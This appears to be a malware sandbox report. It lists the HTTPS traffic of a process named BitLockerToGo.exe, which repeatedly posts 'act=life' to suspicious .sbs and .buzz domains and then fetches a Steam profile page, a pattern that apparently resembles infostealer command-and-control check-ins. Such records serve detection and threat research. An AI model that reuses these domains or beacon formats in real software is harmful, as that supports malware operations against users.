                                                                                                                                                                                      • resinedyw.sbs
                                                                                                                                                                                      • vennurviot.sbs
                                                                                                                                                                                      • ehticsprocw.sbs
                                                                                                                                                                                      • condifendteu.sbs
                                                                                                                                                                                      • drawwyobstacw.sbs
                                                                                                                                                                                      • steamcommunity.com
                                                                                                                                                                                      • sergei-esenin.com

                                                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                      0192.168.2.549704188.114.96.34433748C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                      2024-10-12 23:44:13 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                      Host: proclaimykn.buzz
                                                                                                                                                                                      2024-10-12 23:44:13 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                      Data Ascii: act=life
                                                                                                                                                                                      2024-10-12 23:44:13 UTC817INHTTP/1.1 200 OK
                                                                                                                                                                                      Date: Sat, 12 Oct 2024 23:44:13 GMT
                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                      Connection: close
                                                                                                                                                                                      Set-Cookie: PHPSESSID=6fcsqpd4d9rdqgrb461tvhoem9; expires=Wed, 05 Feb 2025 17:30:52 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xw0R0OqMHTdGDa0HarxyVZ3lOXhvzbcC44o32TQjn2DJZUEEpTN%2BarjSQ7lcHVEokisjfKoqE%2FXT0TSW2Ict1PReHeFBLve4xIDJzupZxPMwLPCv7o46N7O2JitpPWk2UJPo"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                      CF-RAY: 8d1af4e3dc9419c7-EWR
                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                      2024-10-12 23:44:13 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                      Data Ascii: aerror #D12
                                                                                                                                                                                      2024-10-12 23:44:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                      1192.168.2.549705188.114.96.34433748C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                      2024-10-12 23:44:14 UTC260OUTPOST /api HTTP/1.1
                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                      Host: mathcucom.sbs
                                                                                                                                                                                      2024-10-12 23:44:14 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                      Data Ascii: act=life
                                                                                                                                                                                      2024-10-12 23:44:14 UTC819INHTTP/1.1 200 OK
                                                                                                                                                                                      Date: Sat, 12 Oct 2024 23:44:14 GMT
                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                      Connection: close
                                                                                                                                                                                      Set-Cookie: PHPSESSID=jh2lb8s10c86u20ja9mi4e2ur4; expires=Wed, 05 Feb 2025 17:30:53 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FtmRopq45wqNROzYN2KcuoX4N21oqffJ53Hf3MEgdMTEhuv89rxmj0yneQua8X3O5SnIgx0oJfDL%2FArfcKnDth36YU%2BOOJDZDqNmIK6kO5W0%2BWpl7K%2F4mFIlGBDNada8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                      CF-RAY: 8d1af4ea3f0d4380-EWR
                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                      2024-10-12 23:44:14 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                      Data Ascii: aerror #D12
                                                                                                                                                                                      2024-10-12 23:44:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                      2192.168.2.549707172.67.152.134433748C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                      2024-10-12 23:44:15 UTC260OUTPOST /api HTTP/1.1
                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                      Host: enlargkiw.sbs
                                                                                                                                                                                      2024-10-12 23:44:15 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                      Data Ascii: act=life
                                                                                                                                                                                      2024-10-12 23:44:15 UTC815INHTTP/1.1 200 OK
                                                                                                                                                                                      Date: Sat, 12 Oct 2024 23:44:15 GMT
                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                      Connection: close
                                                                                                                                                                                      Set-Cookie: PHPSESSID=2psr2lmo5nacf89lvqueonehb0; expires=Wed, 05 Feb 2025 17:30:54 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cmsqL76du4C2sxY6mevfaFtBjT14bLbpNR6DgRjeUShRPVyhWCa7%2BvxWhFpeSkahyGBPSL0A%2FQIlhIOr57WORZqutPW6884XfMAjbZDo9zU9jhHvesL4%2B5Tm6aAfPBgS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                      CF-RAY: 8d1af4f04c5d4285-EWR
                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                      2024-10-12 23:44:15 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                      Data Ascii: aerror #D12
                                                                                                                                                                                      2024-10-12 23:44:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                      3192.168.2.549710172.67.205.1564433748C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                      2024-10-12 23:44:17 UTC260OUTPOST /api HTTP/1.1
                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                      Host: resinedyw.sbs
                                                                                                                                                                                      2024-10-12 23:44:17 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                      Data Ascii: act=life
                                                                                                                                                                                      2024-10-12 23:44:17 UTC813INHTTP/1.1 200 OK
                                                                                                                                                                                      Date: Sat, 12 Oct 2024 23:44:17 GMT
                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                      Connection: close
                                                                                                                                                                                      Set-Cookie: PHPSESSID=k8tjbnlsg70otfoo8g5d8s9g67; expires=Wed, 05 Feb 2025 17:30:56 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5wb3GisecAltVPVVxMOXYK3nhyHDKVFaGVaPnD1%2FAbAliiFaEa%2FfoyeGRj5Y0RQ7EaWZSZqlfUlk6MJZe65wFh0QqIMFyPkpPaUvvZEnerPpvcXFc0YRjHxReYr0vYcV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                      CF-RAY: 8d1af4fb49894400-EWR
                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                      2024-10-12 23:44:17 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                      Data Ascii: aerror #D12
                                                                                                                                                                                      2024-10-12 23:44:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                      4192.168.2.549714172.67.140.1934433748C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                      2024-10-12 23:44:18 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                      Host: vennurviot.sbs
                                                                                                                                                                                      2024-10-12 23:44:18 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                      Data Ascii: act=life
                                                                                                                                                                                      2024-10-12 23:44:19 UTC825INHTTP/1.1 200 OK
                                                                                                                                                                                      Date: Sat, 12 Oct 2024 23:44:19 GMT
                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                      Connection: close
                                                                                                                                                                                      Set-Cookie: PHPSESSID=8a488v2046d22c2fhq1fgb770g; expires=Wed, 05 Feb 2025 17:30:58 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TNtlTqVo8tA14JrkcD8cT3yEV6efwWJ7%2F0Jxp6h5dGW%2FQ63UOLshtmlqqjZ2kcz4PiQBIsU9V1VhJs5qTmSez%2Fvhh3f6IbpfenQ2tm9S4xPdPlNeKjEbP6GgpjjL584l%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                      CF-RAY: 8d1af5015be78ce0-EWR
                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                      2024-10-12 23:44:19 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                      Data Ascii: aerror #D12
                                                                                                                                                                                      2024-10-12 23:44:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                      5192.168.2.549724172.67.173.2244433748C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                      2024-10-12 23:44:20 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                      Host: ehticsprocw.sbs
                                                                                                                                                                                      2024-10-12 23:44:20 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                      Data Ascii: act=life
                                                                                                                                                                                      2024-10-12 23:44:20 UTC823INHTTP/1.1 200 OK
                                                                                                                                                                                      Date: Sat, 12 Oct 2024 23:44:20 GMT
                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                      Connection: close
                                                                                                                                                                                      Set-Cookie: PHPSESSID=jea3ft6rf81fa51am1is2i4umk; expires=Wed, 05 Feb 2025 17:30:59 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IC7%2BviqM5IQG5gmiErVQkyQiA7VfnfruaY%2FogG2fu4u0fKIq0FTDyNaqxAOkGZVu1mE4s8%2BqJWaB7JV7aUSixiKU0JxULwUk8Boct4bg7kwFsFZ6y4wfC4%2BjbQd3F5BUi3E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                      CF-RAY: 8d1af50dd84d4314-EWR
                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                      2024-10-12 23:44:20 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                      Data Ascii: aerror #D12
                                                                                                                                                                                      2024-10-12 23:44:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                      6192.168.2.549729104.21.79.354433748C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                      2024-10-12 23:44:21 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                      Host: condifendteu.sbs
                                                                                                                                                                                      2024-10-12 23:44:21 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                      Data Ascii: act=life
                                                                                                                                                                                      2024-10-12 23:44:21 UTC813INHTTP/1.1 200 OK
                                                                                                                                                                                      Date: Sat, 12 Oct 2024 23:44:21 GMT
                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                      Connection: close
                                                                                                                                                                                      Set-Cookie: PHPSESSID=n62v8a5hlnljpnaf975ga4cmgs; expires=Wed, 05 Feb 2025 17:31:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H1ccwxnEOyd0b8SNc8fZEusdsrK1AVSD6tLcrffEiFeW4VKdZYyjDqcDn5QrnryoEkRHkkN9qIHCC0M5wdNV3hefT8mp9j6IMalcY2yXfk3l8Cio988hH9SJ2RAMJiAvv4BI"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                      CF-RAY: 8d1af513c8ee4357-EWR
                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                      2024-10-12 23:44:21 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                      Data Ascii: aerror #D12
                                                                                                                                                                                      2024-10-12 23:44:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                      7192.168.2.549738188.114.96.34433748C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                      2024-10-12 23:44:21 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                      Host: drawwyobstacw.sbs
                                                                                                                                                                                      2024-10-12 23:44:21 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                      Data Ascii: act=life
                                                                                                                                                                                      2024-10-12 23:44:22 UTC827INHTTP/1.1 200 OK
                                                                                                                                                                                      Date: Sat, 12 Oct 2024 23:44:22 GMT
                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                      Connection: close
                                                                                                                                                                                      Set-Cookie: PHPSESSID=v4318581urnhjdcp4v97fslub6; expires=Wed, 05 Feb 2025 17:31:01 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jv1bj2l3GE%2BRr9vjKR470rnQfxFN2LQ9JiKB6snOWbBy4nCYeONK2DqU0F6mw4116P1NEd7Q0yUogOxRH8Zycq%2FW4WoUmOrE%2ByGa3tZq5632QkPzYhDTj1NSkEp0NdPDnzx5aA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                      CF-RAY: 8d1af519de8d41d8-EWR
                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                      2024-10-12 23:44:22 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                      Data Ascii: aerror #D12
                                                                                                                                                                                      2024-10-12 23:44:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                      8192.168.2.549744104.102.49.2544433748C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                      2024-10-12 23:44:23 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                      Host: steamcommunity.com
                                                                                                                                                                                      2024-10-12 23:44:23 UTC1870INHTTP/1.1 200 OK
                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                      Date: Sat, 12 Oct 2024 23:44:23 GMT
                                                                                                                                                                                      Content-Length: 34837
                                                                                                                                                                                      Connection: close
                                                                                                                                                                                      Set-Cookie: sessionid=76c06806112d4b2913c8cd51; Path=/; Secure; SameSite=None
                                                                                                                                                                                      Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                      2024-10-12 23:44:23 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                      2024-10-12 23:44:23 UTC16384INData Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f
                                                                                                                                                                                      Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
                                                                                                                                                                                      2024-10-12 23:44:23 UTC3768INData Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                                                                                      Data Ascii: <div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
                                                                                                                                                                                      2024-10-12 23:44:23 UTC171INData Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
